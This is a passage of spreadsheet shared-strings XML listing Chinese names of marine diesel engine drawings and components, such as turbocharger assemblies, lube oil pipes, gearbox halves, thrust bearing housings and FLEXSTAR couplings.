  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链壳处梯子</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平台布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧托架布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端支架布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部格栅布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外部管子清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>草图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却燃油阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器滑油出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油分配管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>透气箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机进口淡水泵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>非正确制造工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>提升机座排气曲轴后端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手动工具</t>
    </r>
  </si>
  <si>
    <r>
      <t>905</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
  </si>
  <si>
    <r>
      <t>909</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
  </si>
  <si>
    <r>
      <t>910</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
  </si>
  <si>
    <r>
      <t>914</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气集管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>振动偏移曲线</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部拉撑布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压顶撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>振动补偿器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机内</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>毛坯重量</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>试车台</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前转子草图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩压叶轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>简图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴装配总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>性能曲线</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器效率</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器外形</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机总成起吊</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气分配器布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>二氧化碳灭火系统主管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架在机座上的位置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>小孔支架清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管尺寸列表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰螺钉长度</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插座等用的钻孔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管长</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量点描述</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环氧垫块基座图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢垫块基座图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地脚螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地脚调节螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试台基座综述</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锲块板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锲块支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锲块键</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮供油图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统供油图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>技术数据</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>键</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>键槽联接</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检验形式</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-Geislinger</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检验</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机带齿轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检验</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮单独</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮标记</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮标记</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮标记</t>
    </r>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标记</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>箭头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旋转方向</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带离合器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>FLEXSTAR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截面</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不带离合器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>FLEXSTAR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截面</t>
    </r>
  </si>
  <si>
    <r>
      <t>FLEXSTAR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>额外加工</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱下部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱上部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱，上部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱，上部铸</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承架总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承架下部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承架下部铸件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承架上部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承架上部铸件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封架总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封架下部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封架下部铸件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封架上部</t>
    </r>
  </si>
